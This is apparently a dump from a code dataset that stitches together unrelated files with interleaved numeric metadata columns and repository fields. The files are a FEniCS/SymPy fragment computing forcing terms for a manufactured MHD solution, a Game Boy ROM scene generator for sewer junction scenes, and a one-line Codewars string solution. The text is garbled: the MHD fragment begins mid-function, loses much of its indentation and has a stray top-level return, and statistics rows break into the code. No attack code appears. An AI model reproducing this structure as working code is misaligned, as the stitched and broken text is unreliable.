# Using https://en.wikipedia.org/wiki/Del_in_cylindrical_and_spherical_coordinates defintitions of the derivative operators (sy.diff(u,rho) means partial derivative of u with respect to rho)
# Laplacian
L11 = (1./rho)*sy.diff(rho*sy.diff(u,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(u,phi),phi) - (1./rho**2)*u - (2./rho**2)*sy.diff(v, phi)
L22 = (1./rho)*sy.diff(rho*sy.diff(v,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(v,phi),phi) - (1./rho**2)*v + (2./rho**2)*sy.diff(u, phi)
# Advection
A11 = u*sy.diff(u, rho) + (1./rho)*v*sy.diff(u, phi) - u**2/rho
A22 = u*sy.diff(v, rho) + (1./rho)*v*sy.diff(v, phi) + v*u/rho
# Pressure gradient
P11 = sy.diff(p, rho)
P22 = (1./rho)*sy.diff(p, phi)
# Curl-curl
c = (1./rho)*(sy.diff(rho*d, rho) - sy.diff(b, phi))
C11 = (1./rho)*sy.diff(c, phi)
C22 = -sy.diff(c, rho)
# Multiplier gradient
R11 = sy.diff(r, rho)
R22 = sy.diff(r, rho)
# Coupling term for fluid variables
NS11 = -c*d
NS22 = c*b
# Coupling term for Magnetic variables
c = u*d-v*b
M11 = (1./rho)*sy.diff(c, phi)
M22 = -sy.diff(c, rho)
FF = sy.diff(u, rho) + (1./rho)*sy.diff(v, phi)
# print "\n\n\nL limits \n\n"
# print sy.limit(L1, rho,0), sy.limit(sy.limit(L1, phi,0),rho,0)
# print sy.limit(L11, rho,0), sy.limit(sy.limit(L11, phi,0),rho,0)
# print "\n", sy.limit(L2, rho,0), sy.limit(sy.limit(L2, phi,0),rho,0)
# print sy.limit(L22, rho,0), sy.limit(sy.limit(L22, phi,0),rho,0)
# print "\n\n\nA limits \n\n"
# print sy.limit(A1, rho,0), sy.limit(sy.limit(A1, phi,0),rho,0)
# print sy.limit(A11, rho,0), sy.limit(sy.limit(A11, phi,0),rho,0)
# print "\n", sy.limit(A2, rho,0), sy.limit(sy.limit(A2, phi,0),rho,0)
# print sy.limit(A22, rho,0), sy.limit(sy.limit(A22, phi,0),rho,0)
# print "\n\n\nP limits \n\n"
# print sy.limit(P1, rho,0), sy.limit(sy.limit(P1, phi,0),rho,0)
# print sy.limit(P11, rho,0), sy.limit(sy.limit(P11, phi,0),rho,0)
# print "\n", sy.limit(P2, rho,0), sy.limit(sy.limit(P2, phi,0),rho,0)
# print sy.limit(P22, rho,0), sy.limit(sy.limit(P22, phi,0),rho,0)
# print "\n\n\nC limits \n\n"
# print sy.limit(C1, rho,0), sy.limit(sy.limit(C1, phi,0),rho,0)
# print sy.limit(C11, rho,0), sy.limit(sy.limit(C11, phi,0),rho,0)
# print "\n", sy.limit(C2, rho,0), sy.limit(sy.limit(C2, phi,0),rho,0)
# print sy.limit(C22, rho,0), sy.limit(sy.limit(C22, phi,0),rho,0)
# print "\n\n\nR limits \n\n"
# print sy.limit(R1, rho,0), sy.limit(sy.limit(R1, phi,0),rho,0)
# print sy.limit(R11, rho,0), sy.limit(sy.limit(R11, phi,0),rho,0)
# print "\n", sy.limit(R2, rho,0), sy.limit(sy.limit(R2, phi,0),rho,0)
# print sy.limit(R22, rho,0), sy.limit(sy.limit(R22, phi,0),rho,0)
# print "N\n\n\nS limits \n\n"
# print sy.limit(NS1, rho,0), sy.limit(sy.limit(NS1, phi,0),rho,0)
# print sy.limit(NS11, rho,0), sy.limit(sy.limit(NS11, phi,0),rho,0)
# print "\n", sy.limit(NS2, rho,0), sy.limit(sy.limit(NS2, phi,0),rho,0)
# print sy.limit(NS22, rho,0), sy.limit(sy.limit(NS22, phi,0),rho,0)
# print "\n\n\nM limits \n\n"
# print sy.limit(M1, rho,0), sy.limit(sy.limit(M1, phi,0),rho,0)
# print sy.limit(M11, rho,0), sy.limit(sy.limit(M11, phi,0),rho,0)
# print "\n", sy.limit(M2, rho,0), sy.limit(sy.limit(M2, phi,0),rho,0)
# print sy.limit(M22, rho,0), sy.limit(sy.limit(M22, phi,0),rho,0)
# print "\n\n\Fluid limits \n\n"
# print sy.limit(u, rho,0), sy.limit(sy.limit(u, phi,0),rho,0)
# print sy.limit(v, rho,0), sy.limit(sy.limit(v, phi,0),rho,0)
# print sy.limit(p, rho,0), sy.limit(sy.limit(p, phi,0),rho,0)
# print "\n\n\nVelocity limits \n\n"
# print sy.limit(b, rho,0), sy.limit(sy.limit(b, phi,0),rho,0)
# print sy.limit(d, rho,0), sy.limit(sy.limit(d, phi,0),rho,0)
# print sy.limit(r, rho,0), sy.limit(sy.limit(r, phi,0),rho,0)
# ssss
# graduu0 = Expression(sy.ccode(sy.diff(u, rho) + (1./rho)*sy.diff(u, phi)))
graduu0 = Expression((sy.ccode(sy.diff(u, rho)),sy.ccode(sy.diff(v, rho))))
Laplacian = Expression((sy.ccode(L11),sy.ccode(L22)))
Advection = Expression((sy.ccode(A11),sy.ccode(A22)))
gradPres = Expression((sy.ccode(P11),sy.ccode(P22)))
CurlCurl = Expression((sy.ccode(C11),sy.ccode(C22)))
gradR = Expression((sy.ccode(R11).replace('M_PI','pi'),sy.ccode(R22).replace('M_PI','pi')))
NS_Couple = Expression((sy.ccode(NS11),sy.ccode(NS22)))
M_Couple = Expression((sy.ccode(M11),sy.ccode(M22)))
# ignore this! Just removes the singularity (atan2(0,0) = NaN) and makes all functions zero at the origin
class u0(Expression):
def __init__(self, mesh, uu0):
self.mesh = mesh
self.u0 = uu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
# print theta
if theta < 0:
theta += 2*np.pi
values[0] = self.u0(r, theta)[0]
values[1] = self.u0(r,theta)[1]
def value_shape(self):
return (2,)
class gradu0(Expression):
def __init__(self, mesh, graduu0):
self.mesh = mesh
self.gradu0 = graduu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values = self.gradu0(r,theta)
class p0(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
def eval(self, values, x):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
class p0Vec(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
def eval(self, values, x):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
# def value_shape(self):
# return (1,)
class b0(Expression):
def __init__(self, mesh, bu0):
self.mesh = mesh
self.b0 = bu0
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.b0(r, theta)[0]
values[1] = self.b0(r,theta)[1]
# print values
def value_shape(self):
return (2,)
class r0(Expression):
def __init__(self, mesh, element=None):
self.mesh = mesh
def eval(self, values, x):
values[0] = 1.0
# def value_shape(self):
# return ( )
class F_NS(Expression):
    """Navier-Stokes forcing term, evaluated from analytic pieces given in
    polar coordinates.

    Only the advection and coupling contributions are evaluated; the
    Laplacian and pressure-gradient callables are stored but never used
    here — presumably those terms cancel analytically for this
    manufactured solution (TODO confirm against the problem setup).
    """
    def __init__(self, mesh, Laplacian, Advection, gradPres, NS_Couple, params):
        self.mesh = mesh
        self.Laplacian = Laplacian
        self.Advection = Advection
        self.gradPres = gradPres
        self.NS_Couple = NS_Couple
        self.params = params
    def eval_cell(self, values, x, ufc_cell):
        if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # theta is undefined at the origin; force the value to zero.
            values[0] = 0.0
            values[1] = 0.0
        else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                # Normalise theta into [0, 2*pi).
                theta += 2*np.pi
            # params[0] scales the coupling contribution.
            values[0] = self.Advection(r,theta)[0] - self.params[0]*self.NS_Couple(r,theta)[0]
            values[1] = self.Advection(r,theta)[1] - self.params[0]*self.NS_Couple(r,theta)[1]
            # ssss
            # print values
    def value_shape(self):
        # 2-D vector field.
        return (2,)
class F_S(Expression):
    """Stokes forcing term: identically zero for this problem.

    The Laplacian/gradPres/params arguments are retained on the instance
    for interface parity with the other forcing Expressions but are never
    evaluated.
    """
    def __init__(self, mesh, Laplacian, gradPres, params):
        self.mesh = mesh
        self.Laplacian = Laplacian
        self.gradPres = gradPres
        self.params = params
    def eval_cell(self, values, x, ufc_cell):
        # Zero vector everywhere, independent of x.
        for component in range(2):
            values[component] = 0
    def value_shape(self):
        # 2-D vector field.
        return (2,)
# params[1]*params[0]*CurlCurl+gradR -params[0]*M_Couple
class F_M(Expression):
    """Maxwell forcing term, evaluated from the analytic coupling given in
    polar coordinates.

    CurlCurl and gradR are stored but never evaluated here — presumably
    those contributions cancel analytically for this manufactured solution
    (TODO confirm); only -params[0]*M_Couple is applied.
    """
    def __init__(self, mesh, CurlCurl, gradR ,M_Couple, params):
        self.mesh = mesh
        self.CurlCurl = CurlCurl
        self.gradR = gradR
        self.M_Couple = M_Couple
        self.params = params
    def eval_cell(self, values, x, ufc_cell):
        if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # theta is undefined at the origin; force the value to zero.
            values[0] = 0.0
            values[1] = 0.0
        else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                # Normalise theta into [0, 2*pi).
                theta += 2*np.pi
            values[0] = - self.params[0]*self.M_Couple(r,theta)[0]
            values[1] = - self.params[0]*self.M_Couple(r,theta)[1]
    def value_shape(self):
        # 2-D vector field.
        return (2,)
class F_MX(Expression):
    """Zero 2-vector forcing term (homogeneous right-hand side)."""
    def __init__(self, mesh):
        self.mesh = mesh
    def eval_cell(self, values, x, ufc_cell):
        # Identically zero, independent of x.
        values[0] = values[1] = 0.0
    def value_shape(self):
        # 2-D vector field.
        return (2,)
class Neumann(Expression):
    """Neumann boundary data built from the exact pressure and velocity
    gradient, both supplied in polar coordinates.

    NOTE(review): the origin branch returns (2.0, 0.0) rather than zero —
    looks intentional for this boundary segment, but worth confirming.
    """
    def __init__(self, mesh, pu0, graduu0, params, n):
        self.mesh = mesh
        self.p0 = pu0
        self.gradu0 = graduu0
        self.params = params
        # Facet normal; stored but not referenced in eval_cell below.
        self.n = n
    def eval_cell(self, values, x, ufc_cell):
        if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            values[0] = 2.0
            values[1] = 0.0
        else:
            # print x[0], x[1]
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                # Normalise theta into [0, 2*pi).
                theta += 2*np.pi
            # cell = Cell(self.mesh, ufc_cell.index)
            # print ufc_cell
            # n = cell.normal(ufc_cell.local_facet)
            # n = FacetNormal(self.mesh)
            # print self.n
            # sss
            # params[0] scales the viscous contribution.
            values[0] = (self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
            # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
            values[1] = -(self.params[0]*self.gradu0(r,theta)[1])
    def value_shape(self):
        # 2-D vector field.
        return (2,)
# class NeumannGrad(Expression):
# def __init__(self, mesh, pu0, graduu0, params, n):
# self.mesh = mesh
# self.p0 = pu0
# self.gradu0 = graduu0
# self.params = params
# self.n = n
# def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 2.0
# values[1] = 0.0
# else:
# # print x[0], x[1]
# r = sqrt(x[0]**2 + x[1]**2)
# theta = np.arctan2(x[1],x[0])
# if theta < 0:
# theta += 2*np.pi
# # cell = Cell(self.mesh, ufc_cell.index)
# # print ufc_cell
# # n = cell.normal(ufc_cell.local_facet)
# # n = FacetNormal(self.mesh)
# # print self.n
# # sss
# values[0] = -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
# # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
# values[1] = (self.params[0]*self.gradu0(r,theta)[1])
# def value_shape(self):
# return (2,)
u0 = u0(mesh, uu0)
p0 = p0(mesh, pu0)
p0vec = p0Vec(mesh, pu0)
b0 = b0(mesh, bu0)
r0 = r0(mesh)
F_NS = F_NS(mesh, Laplacian, Advection, gradPres, NS_Couple, params)
F_M = F_M(mesh, CurlCurl, gradR, M_Couple, params)
F_MX = F_MX(mesh)
F_S = F_S(mesh, Laplacian, gradPres, params)
gradu0 = gradu0(mesh, graduu0)
Neumann = Neumann(mesh, pu0, graduu0, params, FacetNormal(mesh))
# NeumannGrad = NeumannGrad(mesh, p0, graduu0, params, FacetNormal(mesh))
return u0, p0, b0, r0, F_NS, F_M, F_MX, F_S, gradu0, Neumann, p0vec
# Sets up the initial guess for the MHD problem
def Stokes(V, Q, F, u0, p0, gradu0, params,boundaries, domains):
    """Solve a Stokes problem with a direct (MUMPS LU) solve; used to set
    up the velocity/pressure initial guess for the MHD iteration.

    V, Q         -- velocity and pressure function spaces (combined W = V*Q)
    F            -- momentum-equation body force
    u0           -- Dirichlet velocity data on boundary marker 1
    p0           -- exact pressure (accepted but unused here)
    gradu0       -- Neumann data applied on boundary marker 2
    params       -- model parameters; params[2] scales the viscous term
    boundaries   -- facet markers for ds/DirichletBC
    domains      -- cell markers (accepted but unused here)

    Returns (u_k, p_k): velocity and pressure Functions, with the pressure
    shifted to zero mean.
    """
    parameters['reorder_dofs_serial'] = False
    W = V*Q
    IS = MO.IndexSet(W)  # index sets for the velocity/pressure split
    mesh = W.mesh()
    ds = Measure('ds', domain=mesh, subdomain_data=boundaries)
    dx = Measure('dx', domain=mesh)
    (u, p) = TrialFunctions(W)
    (v, q) = TestFunctions(W)
    n = FacetNormal(W.mesh())
    # Saddle-point weak form: viscous block plus the two divergence blocks.
    a11 = params[2]*inner(grad(v), grad(u))*dx('everywhere')
    a12 = -div(v)*p*dx('everywhere')
    a21 = -div(u)*q*dx('everywhere')
    a = a11+a12+a21
    L = inner(v, F)*dx('everywhere') + inner(gradu0,v)*ds(2)
    # NOTE(review): `boundary` and `n` appear unused — candidates for removal.
    def boundary(x, on_boundary):
        return on_boundary
    bcu = DirichletBC(W.sub(0), u0, boundaries, 1)
    A, b = assemble_system(a, L, bcu)
    A, b = CP.Assemble(A, b)  # convert assembled system to PETSc objects
    u = b.duplicate()
    # Direct solve: 'preonly' KSP with an LU preconditioner via MUMPS.
    ksp = PETSc.KSP()
    ksp.create(comm=PETSc.COMM_WORLD)
    pc = ksp.getPC()
    ksp.setType('preonly')
    pc.setType('lu')
    OptDB = PETSc.Options()
    OptDB['pc_factor_mat_solver_package'] = "mumps"
    OptDB['pc_factor_mat_ordering_type'] = "rcm"
    ksp.setFromOptions()
    # print b.array
    # bbb
    # Normalise the RHS to unit norm before solving; undo the scaling after.
    scale = b.norm()
    b = b/scale
    ksp.setOperators(A,A)
    del A
    ksp.solve(b,u)
    # Mits +=dodim
    u = u*scale
    u_k = Function(V)
    p_k = Function(Q)
    u_k.vector()[:] = u.getSubVector(IS[0]).array
    p_k.vector()[:] = u.getSubVector(IS[1]).array
    # Pressure is only defined up to a constant: shift it to zero mean.
    ones = Function(Q)
    ones.vector()[:]=(0*ones.vector().array()+1)
    p_k.vector()[:] += -assemble(p_k*dx('everywhere'))/assemble(ones*dx('everywhere'))
    return u_k, p_k
def Maxwell(V, Q, F, b0, r0, params, boundaries):
    """Solve the mixed Maxwell subproblem with a direct (MUMPS LU) solve;
    used to set up the magnetic-field/multiplier initial guess.

    V, Q       -- magnetic field and multiplier function spaces (W = V*Q)
    F          -- right-hand-side forcing
    b0, r0     -- Dirichlet data for the field and the multiplier (marker 1)
    params     -- model parameters; params[1]*params[2] scales curl-curl term
    boundaries -- facet markers for the DirichletBCs

    Returns (u_k, p_k): magnetic field and multiplier Functions.
    """
    parameters['reorder_dofs_serial'] = False
    W = V*Q
    IS = MO.IndexSet(W)  # index sets for the field/multiplier split
    mesh = W.mesh()
    # dx = Measure('dx', domain=mesh)
    print params
    (u, p) = TrialFunctions(W)
    (v, q) = TestFunctions(W)
    n = FacetNormal(W.mesh())
    # Mixed weak form: curl-curl block plus the two gradient coupling blocks.
    a11 = params[1]*params[2]*inner(curl(v), curl(u))*dx('everywhere')
    a21 = inner(u,grad(q))*dx('everywhere')
    a12 = inner(v,grad(p))*dx('everywhere')
    L = inner(v, F)*dx('everywhere')
    a = a11+a12+a21
    # NOTE(review): `boundary` and `n` appear unused — candidates for removal.
    def boundary(x, on_boundary):
        return on_boundary
    bcb = DirichletBC(W.sub(0), b0, boundaries, 1)
    bcr = DirichletBC(W.sub(1), r0, boundaries, 1)
    bc = [bcb, bcr]
    A, b = assemble_system(a, L, bc)
    A, b = CP.Assemble(A, b)  # convert assembled system to PETSc objects
    u = b.duplicate()
    # Direct solve: 'preonly' KSP with an LU preconditioner via MUMPS.
    ksp = PETSc.KSP()
    ksp.create(comm=PETSc.COMM_WORLD)
    pc = ksp.getPC()
    ksp.setType('preonly')
    pc.setType('lu')
    OptDB = PETSc.Options()
    OptDB['pc_factor_mat_solver_package'] = "mumps"
    OptDB['pc_factor_mat_ordering_type'] = "rcm"
    ksp.setFromOptions()
    # Normalise the RHS to unit norm before solving; undo the scaling after.
    scale = b.norm()
    b = b/scale
    ksp.setOperators(A,A)
    del A
    ksp.solve(b,u)
    # Mits +=dodim
    u = u*scale
    u_k = Function(V)
    p_k = Function(Q)
    u_k.vector()[:] = u.getSubVector(IS[0]).array
    p_k.vector()[:] = u.getSubVector(IS[1]).array
    # print u_k.vector().array()
    # sss
    return u_k, p_k
| 34.957389
| 199
| 0.519762
| 5,983
| 38,558
| 3.29283
| 0.054822
| 0.072484
| 0.02071
| 0.037968
| 0.91772
| 0.911781
| 0.902898
| 0.902898
| 0.897112
| 0.894878
| 0
| 0.056333
| 0.307122
| 38,558
| 1,102
| 200
| 34.989111
| 0.68109
| 0.30554
| 0
| 0.868167
| 0
| 0
| 0.013346
| 0.004159
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.016077
| null | null | 0.001608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ea80fa03c40a53d8597d2644176d798c1f5c2a49
| 20,085
|
py
|
Python
|
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | 3
|
2021-08-07T03:38:02.000Z
|
2021-09-17T14:33:27.000Z
|
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
rom_generator/scenes/imported/Junctions.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
# Generated Scene Functions
# Junctions.py
from rom_generator import generator
from rom_generator import script_functions as script
import random
test_generation_destination_path = "../gbprojects/generated_export_test_Junctions/"
def scene_generation():
    """Build the junction scene library for the generated ROM.

    Returns a (catalog, sprite_sheet_data) pair: `catalog(sample=True)`
    yields scene-generator callables and `sprite_sheet_data` lists the
    sprite sheets those scenes depend on.

    The five scene generators previously carried five byte-identical
    `addConnection_XX` closures and duplicated scene-bundle boilerplate;
    those are factored into the shared helpers below.  The per-scene
    `actor_name_table`/`trigger_XX` locals were never attached to the
    scenes and have been dropped.
    """
    sprite_sheet_data = [
        generator.makeSpriteSheet('actor.png', name='actor', type='actor', frames=3),
        generator.makeSpriteSheet('actor_animated.png', name='actor_animated', type='actor_animated', frames=6),
        generator.makeSpriteSheet('static.png', name='static', type='static', frames=1)]

    def findSpriteByName(sprite_name):
        '''
        Returns the first sprite sheet that matches the name given, or None.
        '''
        return next((s for s in sprite_sheet_data if s.get('name') == sprite_name), None)

    def getBySceneLabel(scene_label):
        '''
        This is mostly here so we can get the matching scene from the original
        template data. As used here it just grabs the first scene that was made
        from that template, so if the template is used more than once it won't
        behave as expected and you should generate a proper relationship instad.
        '''
        s_id = generator.getSceneIdByLabel(scene_label)
        if s_id is None:
            return '<♔' + scene_label + '♔>'
        return s_id

    def _makeSwitchSceneCreator():
        '''
        Returns a fresh trigger-creator closure that switches scenes on contact
        (one distinct callable per connection, matching the old behaviour).
        '''
        def creator(source_location, source_size, destination_scene_id, destination_location, destination_direction):
            trigger = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
            trigger['script'] = [
                script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
                script.end()
            ]
            return trigger
        return creator

    def _makeConnection(scene_id, exit_location, exit_direction, entrance_location, entrance_size):
        '''
        Builds one SLOT_CONNECTION descriptor for connectScenesRandomlySymmetric.
        '''
        return {'type': 'SLOT_CONNECTION', 'creator': _makeSwitchSceneCreator(), 'args': { 'exit_location': exit_location, 'exit_direction': exit_direction, 'entrance': scene_id, 'entrance_location': entrance_location, 'entrance_size': entrance_size }, 'tags': ['A'] }

    def _makeSceneData(scene_name, scene_label, background_png, collisions, connection_specs):
        '''
        Assembles the scene/background/connection bundle shared by every
        generator below.  `connection_specs` is a list of
        (exit_location, exit_direction, entrance_location, entrance_size).
        '''
        bkg = generator.makeBackground(background_png)
        scn = generator.makeScene(scene_name, bkg, collisions=collisions, actors=[], triggers=[], scene_label=scene_label)
        connections = [_makeConnection(scn['id'], *spec) for spec in connection_specs]
        return {"scene": scn, "background": bkg, "sprites": [], "connections": connections, "references": [], "tags": ["Sewer"]}

    def scene_gen_corner_00001(callback):
        # Corner piece: connections on the top and right edges.
        collisions = [255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 255, 15, 240, 255, 0, 240, 15, 0, 255, 0, 240, 15, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255]
        return _makeSceneData("_gen_corner", "scene_gen_corner_00001", "link_01a.png", collisions, [
            ((11, 1), 'down', (8, 0), (8, 1)),
            ((17, 10), 'left', (19, 8), (1, 4))])

    def scene_gen_junctionDown_00002(callback):
        # T-junction opening downward: left, right and bottom connections.
        collisions = [255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252]
        return _makeSceneData("_gen_junctionDown", "scene_gen_junctionDown_00002", "link_01b.png", collisions, [
            ((1, 5), 'right', (0, 2), (1, 6)),
            ((17, 5), 'left', (19, 2), (1, 6)),
            ((10, 16), 'up', (8, 17), (6, 1))])

    def scene_gen_JunctionLeft_00003(callback):
        # T-junction opening leftward: top, left and bottom connections.
        collisions = [255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 255, 192, 255, 15, 252, 0, 192, 15, 0, 252, 0, 240, 15, 0, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255]
        return _makeSceneData("_gen_JunctionLeft", "scene_gen_JunctionLeft_00003", "link_01c.png", collisions, [
            ((10, 1), 'down', (8, 0), (6, 1)),
            ((1, 10), 'right', (0, 8), (1, 4)),
            ((5, 16), 'up', (4, 17), (4, 1))])

    def scene_gen_JunctionUp_00004(callback):
        # T-junction opening upward: top, left and right connections.
        collisions = [255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 3, 0, 48, 0, 0, 3, 0, 48, 0, 0, 195, 255, 63, 252, 255, 192, 255, 15, 252, 255, 255, 255, 255, 255, 255]
        return _makeSceneData("_gen_JunctionUp", "scene_gen_JunctionUp_00004", "link_01d.png", collisions, [
            ((9, 1), 'down', (8, 0), (4, 1)),
            ((1, 15), 'right', (0, 14), (1, 2)),
            ((17, 10), 'left', (19, 8), (1, 4))])

    def scene_gen_JunctionRight_00005(callback):
        # T-junction opening rightward: top, right and bottom connections.
        collisions = [255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 0, 240, 15, 0, 255, 0, 240, 15, 0, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255]
        return _makeSceneData("_gen_JunctionRight", "scene_gen_JunctionRight_00005", "link_01e.png", collisions, [
            ((9, 1), 'down', (8, 0), (4, 1)),
            ((17, 10), 'left', (19, 8), (1, 4)),
            ((9, 16), 'up', (8, 17), (4, 1))])

    def catalog(sample=True):
        """
        Returns a list of scene functions from this part of the library.
        By default a random sample of two; pass sample=False for all five.
        """
        cat = [scene_gen_corner_00001,
            scene_gen_junctionDown_00002,
            scene_gen_JunctionLeft_00003,
            scene_gen_JunctionUp_00004,
            scene_gen_JunctionRight_00005]
        if sample:
            return random.sample(cat,2)
        return cat
    return catalog, sprite_sheet_data
def createExampleProject():
    """
    Demonstration of how the scene generators in this file can be used.

    Builds a basic project, registers the player sprite, instantiates the
    generated scenes, wires them together randomly, adds music and a start
    position, and returns the assembled project object.
    """
    project = generator.makeBasicProject()

    # Create sprite sheet for the player sprite
    player_sprite_sheet = generator.addSpriteSheet(project, "actor_animated.png", "actor_animated", "actor_animated")
    project.settings["playerSpriteSheetId"] = player_sprite_sheet["id"]

    # Instantiate every scene from the generated catalog (callback unused).
    scene_data_list = []
    catalog, sprites = scene_generation()
    for scn_func in catalog():
        scene_data_list.append(scn_func(None))
    for element_sprite in sprites:
        project.spriteSheets.append(element_sprite)

    # Pair up scene exits/entrances, then resolve cross-scene references
    # before adding each scene to the project.
    generator.connectScenesRandomlySymmetric(scene_data_list)
    for sdata in scene_data_list:
        generator.addSceneData(project, generator.translateReferences(sdata, scene_data_list))

    # Add some music
    project.music.append(generator.makeMusic("template", "template.mod"))

    # Set the starting scene
    project.settings["startSceneId"] = project.scenes[0]["id"]
    project.settings["startX"] = 7
    project.settings["startY"] = 21
    return project
def runTest(test_dir):
    """Generate the example project and write it to `test_dir` on disk."""
    generator.initializeGenerator()
    project = createExampleProject()
    generator.writeProjectToDisk(project, output_path = test_dir)
# test creating scenes...
if __name__ == '__main__':
    # Build and export the demo project when run as a script.
    runTest(test_generation_destination_path)
| 65.852459
| 251
| 0.662534
| 2,401
| 20,085
| 5.249063
| 0.088713
| 0.031104
| 0.059986
| 0.016187
| 0.80703
| 0.80457
| 0.798381
| 0.771404
| 0.764818
| 0.753868
| 0
| 0.073742
| 0.206672
| 20,085
| 304
| 252
| 66.069079
| 0.717083
| 0.03052
| 0
| 0.526087
| 1
| 0
| 0.145061
| 0.009394
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.013043
| 0
| 0.23913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57c7c0d3fbe0dcdfa8f0d8ac7dac0dc2413c38f3
| 119
|
py
|
Python
|
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0

def solution(*strings):
    """Return shortest + next-shortest + shortest of the given strings.

    Fix: the original lambda re-sorted the arguments three times; sort once.
    Ties keep the arguments' original order (sorted() is stable).
    """
    ordered = sorted(strings, key=len)
    return f'{ordered[0]}{ordered[1]}{ordered[0]}'
| 29.75
| 100
| 0.563025
| 23
| 119
| 2.913043
| 0.521739
| 0.313433
| 0.447761
| 0.58209
